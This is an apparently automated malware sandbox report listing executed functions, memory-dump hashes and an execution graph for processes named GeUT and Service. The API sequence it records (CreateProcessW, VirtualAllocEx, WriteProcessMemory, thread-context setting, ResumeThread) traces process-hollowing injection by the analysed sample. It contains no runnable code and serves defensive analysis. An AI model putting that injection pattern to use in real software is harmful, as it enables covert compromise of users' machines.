                                • Source File: 0000000A.00000002.1660863124.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2c60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd10725630f444954985a45605400cb4dc65c7dd1404dbb87ec451e2914a3860
                                • Instruction ID: bf6c6b51eef543d48e0a1639a4a93c13e648e8196d3410444acbaa114057ad34
                                • Opcode Fuzzy Hash: cd10725630f444954985a45605400cb4dc65c7dd1404dbb87ec451e2914a3860
                                • Instruction Fuzzy Hash: 1811B93790035ADFDB02FF28F880A493BB5FB84705B009A6894148B32DF7707A099F91

                                Executed Functions

                                Function 02E61010 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 38289add1a6834ebc44e68d2d37a1abbd9b07003553ef75d07716aa1a403f9e2
                                • Instruction ID: 41044fef5c48074997b06ceb7effc671f12a5a272d6f4090528cf25cec30f279
                                • Opcode Fuzzy Hash: 38289add1a6834ebc44e68d2d37a1abbd9b07003553ef75d07716aa1a403f9e2
                                • Instruction Fuzzy Hash: BE5171307003058FCB65BF74E46856E7FE6FB946167408669D406DB3AAEF389D04CB91
                                Function 02E6100F Relevance: .2, Instructions: 156COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad901e7d185752e9b69d6fd1eaeb896f16a05b20c9a317a5e19642216f83039c
                                • Instruction ID: adf06ed72c28f1642ea919751ca1ec0103d70cd1bbee6ab406f87077c52e6f54
                                • Opcode Fuzzy Hash: ad901e7d185752e9b69d6fd1eaeb896f16a05b20c9a317a5e19642216f83039c
                                • Instruction Fuzzy Hash: A3514D307003058FCB65BF74E4A856E7FE6FB946167408A69D806DB3A9EF389D04CB81
                                Function 02E61157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 68411865e3eb8c09cf11e283e6574af1cc48d203efaef27e4775270eb3573e5f
                                • Instruction ID: 35c3b43b98eb68461d72ee6ae96e006d52255ddb2572b26816cd88357490998c
                                • Opcode Fuzzy Hash: 68411865e3eb8c09cf11e283e6574af1cc48d203efaef27e4775270eb3573e5f
                                • Instruction Fuzzy Hash: 7131AD71340B018BDBA9AB79D42827E76E2BFC4565350CA6EC01BCB794DF319D049BD2
                                Function 02E612CF Relevance: .1, Instructions: 81COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ce4670024992b7fae2808fa41ce1c7de46fa3a6cf17e0807f72a33b9bf3f0875
                                • Instruction ID: 717286439f64e81c1be8cf1e74e68f86d17601fc2280a624403a5aa10d4c646c
                                • Opcode Fuzzy Hash: ce4670024992b7fae2808fa41ce1c7de46fa3a6cf17e0807f72a33b9bf3f0875
                                • Instruction Fuzzy Hash: C7217A74B401159FDB48DB79D858B6E7BF2FFC8710F244469E505EB3A5CA729C018B90
                                Function 02E6186F Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2426e7899caedb40feabbcf8fd0b7583fc4c30b7c4f95c5ab603eb9ca03cea74
                                • Instruction ID: 029a6e3ddad89f04184853f1b68603df5495707b95f7ac1cfbded017d195ebd2
                                • Opcode Fuzzy Hash: 2426e7899caedb40feabbcf8fd0b7583fc4c30b7c4f95c5ab603eb9ca03cea74
                                • Instruction Fuzzy Hash: 481172B1B012059FDB58ABBE481836FBAEAEFD8651B24842ED40BD7394DE358C0157A1
                                Function 02E61747 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d99a42b82a166e9a08fd25f89fbd9710c2ffa04f5b83c8fcf38b04681461d494
                                • Instruction ID: 375be247960f48fef0e29fdee4bcfdae7797e1d91430258752e77eac77f145ab
                                • Opcode Fuzzy Hash: d99a42b82a166e9a08fd25f89fbd9710c2ffa04f5b83c8fcf38b04681461d494
                                • Instruction Fuzzy Hash: 49311C70A00319DFDB45EFB8D8946ADBFB6FF88202F108569D805A7354DB385A45CB51
                                Function 02E61750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53dd4c2d4a94010e7e5af6376a4aa7ee10a06e4c772c93d3047b9e51acbfa4f4
                                • Instruction ID: 5c3b5a816ad7e9a59d22725d3b2cb532c2c7ab2bed002fa5b316204b0f506cd5
                                • Opcode Fuzzy Hash: 53dd4c2d4a94010e7e5af6376a4aa7ee10a06e4c772c93d3047b9e51acbfa4f4
                                • Instruction Fuzzy Hash: 2A211D70900309DFDB45EFB8D8946ADBFB6FF88202F108569D805A7354DB785E45CB51
                                Function 02E60828 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6db5a0e39ec8c8b087cf2d17703e1751af80a82565ec40c95c7d94a28fc9480
                                • Instruction ID: 6ea911c3a56ad5ab936c28e1eb0a5c1f4d335bff7e78b074450ffb98d91fa77f
                                • Opcode Fuzzy Hash: c6db5a0e39ec8c8b087cf2d17703e1751af80a82565ec40c95c7d94a28fc9480
                                • Instruction Fuzzy Hash: DB219A301053569FDB02EF28F8D0A957FA9FB8160771096B9D804AB22AD77C6D49CBC2
                                Function 02E60939 Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 537bf121c816d245616a9b26ffb0f366bc2125e87825dba786850431544af1ef
                                • Instruction ID: a236e79a4278df9023504d2c57b45345a39a3194bca0843ca35534f3a51aa964
                                • Opcode Fuzzy Hash: 537bf121c816d245616a9b26ffb0f366bc2125e87825dba786850431544af1ef
                                • Instruction Fuzzy Hash: FC01C430B082448FDB49EBB894653AD3FE2EFD6200F1481AEC0459B2E6DF344D05D781
                                Function 02E60848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5aa54ec6e71053830226c7518017a1702a0acc2021ecb82df0e2f595d53c41a
                                • Instruction ID: d162fc62a84a54db8a8130550ea1e7bd5b444ed61287e55db2b03ab7f5c8141e
                                • Opcode Fuzzy Hash: e5aa54ec6e71053830226c7518017a1702a0acc2021ecb82df0e2f595d53c41a
                                • Instruction Fuzzy Hash: E9115B7061131ADFDB01EF28F9C4A557FADF784607B1096B8D804AB229D77C6D498F82

                                Executed Functions

                                Function 00F30D95 Relevance: .5, Instructions: 470COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e180cfad5bab3a4e59de838c8112a4a6ae0c654540c75aca74c143daee1a8e8
                                • Instruction ID: 1279af0e5abbf7d5275ffc2e8cc7562082ada6540cd1ced0c4a1e1d7d8916b20
                                • Opcode Fuzzy Hash: 7e180cfad5bab3a4e59de838c8112a4a6ae0c654540c75aca74c143daee1a8e8
                                • Instruction Fuzzy Hash: AE519F306053898FCB05FF75E89956E7BB2BF882023004A69E446DF365EF305D09DB82
                                Function 00F31010 Relevance: .2, Instructions: 250COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42f0ea3b4a493f8b8c971267ae6302abdcd46cb8d0bc2260b0cad72b1968d43c
                                • Instruction ID: ae29620562b04ee01952309aa354af0e360b5984d59dc491d6aa916eddc3884d
                                • Opcode Fuzzy Hash: 42f0ea3b4a493f8b8c971267ae6302abdcd46cb8d0bc2260b0cad72b1968d43c
                                • Instruction Fuzzy Hash: BC9180307043498FCB05AF75E899A6E7BB2BFC8201B104669E406EF3A5DF319D098B91
                                Function 00F31157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6dbfc706a2bc7baff441ae7e6cf80dd70c87618ddf96657195ec5e4d4399a5a9
                                • Instruction ID: 3d3656de78f1ed6b07fac9406b0caee70a97907af269a53c74061a09d820e0b9
                                • Opcode Fuzzy Hash: 6dbfc706a2bc7baff441ae7e6cf80dd70c87618ddf96657195ec5e4d4399a5a9
                                • Instruction Fuzzy Hash: 8931CF31700B498FCB58BB79986412E76E2BFC86553408A2ED01BDB790EF359E059BD2
                                Function 00F31740 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 665fe7f622e2862c6b1af6320f3c4de7f9ff6c664f1398e1546a19b8a6fb2799
                                • Instruction ID: 69f00abbd7666be7568ed0626c91de3f1ff209ba8cf0fa4da262623a0823386e
                                • Opcode Fuzzy Hash: 665fe7f622e2862c6b1af6320f3c4de7f9ff6c664f1398e1546a19b8a6fb2799
                                • Instruction Fuzzy Hash: 3D31A0749053099FDB41FFB8D8926ADBBB2FF88301F10466AD401AB345EB305A95CB52
                                Function 00F31860 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef988b60f54ea52fc8ea65b841e338c0197e40823233bffe448f6f09aec3ba1e
                                • Instruction ID: 4c6dbf7b770665e7e9c77ac7d6bb3d546e67b90801cd7ccd198c607839386396
                                • Opcode Fuzzy Hash: ef988b60f54ea52fc8ea65b841e338c0197e40823233bffe448f6f09aec3ba1e
                                • Instruction Fuzzy Hash: C721C371B002059FDB14EBBE481432FBAEAEFC8710B10842ED44BE7381DE358C0157A2
                                Function 00F31750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e6e6e37cb18536951637c2433ddcc4b9607c677220e99ebf71c5b62788e8372
                                • Instruction ID: 7b768310ea8518f41b80b84b9d8af85b20e43659b282c6411c36eb8e965c8dcd
                                • Opcode Fuzzy Hash: 1e6e6e37cb18536951637c2433ddcc4b9607c677220e99ebf71c5b62788e8372
                                • Instruction Fuzzy Hash: 2D21A374901309DFDB44FFB8D88269DBBB2FF88701F504629E401AB348EB305A95CB52
                                Function 00F30939 Relevance: .1, Instructions: 66COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 29db80b66bc021836cc2a3c6825c3fcb94b5a4a7feface9924c3be351c080f3a
                                • Instruction ID: d6552451487ed2174c830a28721b4b62bef648f9f04ce74ac9dd7dc55b0d682c
                                • Opcode Fuzzy Hash: 29db80b66bc021836cc2a3c6825c3fcb94b5a4a7feface9924c3be351c080f3a
                                • Instruction Fuzzy Hash: 52219230E052498FCB44EBB8D4657ADBBF1EF85310F2484AED409AB385DB354D15DB81
                                Function 00F30828 Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c7d2b62b1ed6cde30bc46cbf813af781df1c407a805fa809a5815e136ff384b
                                • Instruction ID: 7da2c1df04d1acf43688f56ffd7995ea3cafe85cdf493ccf6504151b70ac501f
                                • Opcode Fuzzy Hash: 2c7d2b62b1ed6cde30bc46cbf813af781df1c407a805fa809a5815e136ff384b
                                • Instruction Fuzzy Hash: 9521313411E3568FDB02FF28F8D2A457B71BB81A067044AA5D4488F56ED7706DA9CB82
                                Function 00F30848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d1f53fad6ef81311e4336db3fcdb58885724f040cbd4088a9ed65c3130d5355a
                                • Instruction ID: 7495928e85faceb6b0c6be0b1c455294a6ebd289676ff828bb7f53def677e77e
                                • Opcode Fuzzy Hash: d1f53fad6ef81311e4336db3fcdb58885724f040cbd4088a9ed65c3130d5355a
                                • Instruction Fuzzy Hash: A111C13411A31A8FDB06FF18F8C2A4577A5F784A067009A64D4488F61DD7706DAA8F92

                                Execution Graph

                                Execution Coverage:32.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:50
                                Total number of Limit Nodes:4
                                execution_graph 4058 2d85f98 4059 2d85fb2 4058->4059 4060 2d86001 4059->4060 4062 2d86450 4059->4062 4063 2d86483 4062->4063 4066 2d84024 4063->4066 4065 2d86677 4065->4059 4067 2d86eb0 CreateProcessW 4066->4067 4069 2d87096 4067->4069 4070 2d81fd8 ReadProcessMemory 4071 2d82097 4070->4071 4072 2d821f8 4073 2d82261 4072->4073 4074 2d82276 WriteProcessMemory 4072->4074 4073->4074 4075 2d822d8 4074->4075 4076 2d82338 ResumeThread 4077 2d823c0 4076->4077 4111 2d81ec8 4112 2d81f3b Wow64SetThreadContext 4111->4112 4113 2d81f26 4111->4113 4114 2d81f84 4112->4114 4113->4112 4115 2d81ba8 4116 2d81c35 CreateProcessW 4115->4116 4118 2d81d8e 4116->4118 4118->4118 4082 2d871d0 4084 2d871ea 4082->4084 4083 2d87239 4084->4083 4089 2d87288 4084->4089 4093 2d87284 4084->4093 4097 2d8727c 4084->4097 4101 2d87279 4084->4101 4091 2d87289 4089->4091 4105 2d8614c 4091->4105 4092 2d874af 4092->4084 4095 2d872bb 4093->4095 4094 2d8614c CreateProcessW 4096 2d874af 4094->4096 4095->4094 4096->4084 4099 2d87289 4097->4099 4098 2d8614c CreateProcessW 4100 2d874af 4098->4100 4099->4098 4100->4084 4103 2d87281 4101->4103 4102 2d8614c CreateProcessW 4104 2d874af 4102->4104 4103->4102 4104->4084 4106 2d87ce8 CreateProcessW 4105->4106 4108 2d87ece 4106->4108 4109 2d820f0 VirtualAllocEx 4110 2d821a7 4109->4110 4119 2d84e40 4120 2d84ecd CreateProcessW 4119->4120 4122 2d85026 4120->4122

                                Executed Functions

                                Function 02D81B9C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 517 2d81b9c-2d81c33 520 2d81c4a-2d81c58 517->520 521 2d81c35-2d81c47 517->521 522 2d81c5a-2d81c6c 520->522 523 2d81c6f-2d81cab 520->523 521->520 522->523 524 2d81cad-2d81cbc 523->524 525 2d81cbf-2d81d8c CreateProcessW 523->525 524->525 529 2d81d8e-2d81d94 525->529 530 2d81d95-2d81e54 525->530 529->530 540 2d81e8a-2d81e95 530->540 541 2d81e56-2d81e7f 530->541 545 2d81e96 540->545 541->540 545->545
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D81D79
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0e7126395f9fa6893352cda7b2d61dbc682a3137be4604d6af9da6027fb49801
                                • Instruction ID: 56c875fe8a9305056d696f862ef7d9c08a0c36b1c05cba22cad7b9a620508ab6
                                • Opcode Fuzzy Hash: 0e7126395f9fa6893352cda7b2d61dbc682a3137be4604d6af9da6027fb49801
                                • Instruction Fuzzy Hash: 8E81C075D0026ADFDB21DFA5C880BDDBBF5AF49300F1091AAE508B7260DB709A89CF54
                                Function 02D84024 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 546 2d84024-2d86f3b 548 2d86f3d-2d86f4f 546->548 549 2d86f52-2d86f60 546->549 548->549 550 2d86f62-2d86f74 549->550 551 2d86f77-2d86fb3 549->551 550->551 552 2d86fb5-2d86fc4 551->552 553 2d86fc7-2d87094 CreateProcessW 551->553 552->553 557 2d8709d-2d8715c 553->557 558 2d87096-2d8709c 553->558 568 2d8715e-2d87187 557->568 569 2d87192-2d8719d 557->569 558->557 568->569 573 2d8719e 569->573 573->573
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87081
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 8c923ea32032048f35bc936b838ef65f309b97db28c9e32770bf1c81cd9eec49
                                • Instruction ID: f6ba7fdb85c6ac395009664912e39261cfcecd1c9bf214cfad353707f76e7ff9
                                • Opcode Fuzzy Hash: 8c923ea32032048f35bc936b838ef65f309b97db28c9e32770bf1c81cd9eec49
                                • Instruction Fuzzy Hash: 9881C175D0026ACFDB20DFA5C880BEDBBF5AB49300F1095AAE508B7250DB709E89CF54
                                Function 02D8614C Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 601 2d8614c-2d87d73 603 2d87d8a-2d87d98 601->603 604 2d87d75-2d87d87 601->604 605 2d87d9a-2d87dac 603->605 606 2d87daf-2d87deb 603->606 604->603 605->606 607 2d87ded-2d87dfc 606->607 608 2d87dff-2d87ecc CreateProcessW 606->608 607->608 612 2d87ece-2d87ed4 608->612 613 2d87ed5-2d87f94 608->613 612->613 623 2d87fca-2d87fd5 613->623 624 2d87f96-2d87fbf 613->624 627 2d87fd6 623->627 624->623 627->627
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87EB9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: c87d26e5d16e32af8e4a6e0d9a1de1b4a085e1c62b80de4260c71907d767295a
                                • Instruction ID: 0b541bcfe18255c894f9842ffa8e626fa9a45ab92d7fdfb96dd2edbce6bd3515
                                • Opcode Fuzzy Hash: c87d26e5d16e32af8e4a6e0d9a1de1b4a085e1c62b80de4260c71907d767295a
                                • Instruction Fuzzy Hash: D981C275D0022ACFDB20DFA5C840BEDBBB5BB49304F1095AAE508B7250D7709E89CF54
                                Function 02D84E34 Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 574 2d84e34-2d84ecb 575 2d84ecd-2d84edf 574->575 576 2d84ee2-2d84ef0 574->576 575->576 577 2d84ef2-2d84f04 576->577 578 2d84f07-2d84f43 576->578 577->578 579 2d84f45-2d84f54 578->579 580 2d84f57-2d85024 CreateProcessW 578->580 579->580 584 2d8502d-2d850ec 580->584 585 2d85026-2d8502c 580->585 595 2d850ee-2d85117 584->595 596 2d85122-2d8512d 584->596 585->584 595->596 600 2d8512e 596->600 600->600
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85011
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: cf61967b6d7e1c1ee099226c9c265a45bee22f2993c6d09247da0aa2b81ffd10
                                • Instruction ID: 6e425737a87e736559595009b58b8214ba4c75c806d7eea4eb195cb5c50618df
                                • Opcode Fuzzy Hash: cf61967b6d7e1c1ee099226c9c265a45bee22f2993c6d09247da0aa2b81ffd10
                                • Instruction Fuzzy Hash: 8A81D175D0026ACFDB20DFA5C980BDDBBB1AF49300F1091AAE508B7250DB709A89CF54
                                Function 02D87CDC Relevance: 1.7, APIs: 1, Instructions: 223processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 629 2d87cdc-2d87d73 631 2d87d8a-2d87d98 629->631 632 2d87d75-2d87d87 629->632 633 2d87d9a-2d87dac 631->633 634 2d87daf-2d87deb 631->634 632->631 633->634 635 2d87ded-2d87dfc 634->635 636 2d87dff-2d87ecc CreateProcessW 634->636 635->636 640 2d87ece-2d87ed4 636->640 641 2d87ed5-2d87f94 636->641 640->641 651 2d87fca-2d87fd5 641->651 652 2d87f96-2d87fbf 641->652 655 2d87fd6 651->655 652->651 655->655
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87EB9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 5354ccba9797e6bb29a72ffaaeaa2dbc30f36c72094261e2662426593394f05c
                                • Instruction ID: c1170e91f105b36c25ea7e9e05400ff7f8c856cab8dcaa90e5c8736c7c357fed
                                • Opcode Fuzzy Hash: 5354ccba9797e6bb29a72ffaaeaa2dbc30f36c72094261e2662426593394f05c
                                • Instruction Fuzzy Hash: 7981C275D0022ADFDB21DFA5C840BDDBBB5BB49304F1095AAE508B7250DB709E89CF54
                                Function 02D86EA4 Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 684 2d86ea4-2d86f3b 685 2d86f3d-2d86f4f 684->685 686 2d86f52-2d86f60 684->686 685->686 687 2d86f62-2d86f74 686->687 688 2d86f77-2d86fb3 686->688 687->688 689 2d86fb5-2d86fc4 688->689 690 2d86fc7-2d87094 CreateProcessW 688->690 689->690 694 2d8709d-2d8715c 690->694 695 2d87096-2d8709c 690->695 705 2d8715e-2d87187 694->705 706 2d87192-2d8719d 694->706 695->694 705->706 710 2d8719e 706->710 710->710
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87081
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: f2f5b23c19ddf57aea58a8a4710fbeffe28f3e81d4a839799bae15383dfb1160
                                • Instruction ID: 0af8ee5e7851104d3716062a9a33782ee700c5d6adef7e0170573f54d2a6bae7
                                • Opcode Fuzzy Hash: f2f5b23c19ddf57aea58a8a4710fbeffe28f3e81d4a839799bae15383dfb1160
                                • Instruction Fuzzy Hash: 8981D3B5D0026ACFDB20DFA5C980BDDBBB5BB49300F1095AAE508B7250DB709E89CF54
                                Function 02D85C6C Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 657 2d85c6c-2d85d03 658 2d85d1a-2d85d28 657->658 659 2d85d05-2d85d17 657->659 660 2d85d2a-2d85d3c 658->660 661 2d85d3f-2d85d7b 658->661 659->658 660->661 662 2d85d7d-2d85d8c 661->662 663 2d85d8f-2d85e5c CreateProcessW 661->663 662->663 667 2d85e5e-2d85e64 663->667 668 2d85e65-2d85f24 663->668 667->668 678 2d85f5a-2d85f65 668->678 679 2d85f26-2d85f4f 668->679 683 2d85f66 678->683 679->678 683->683
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85E49
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
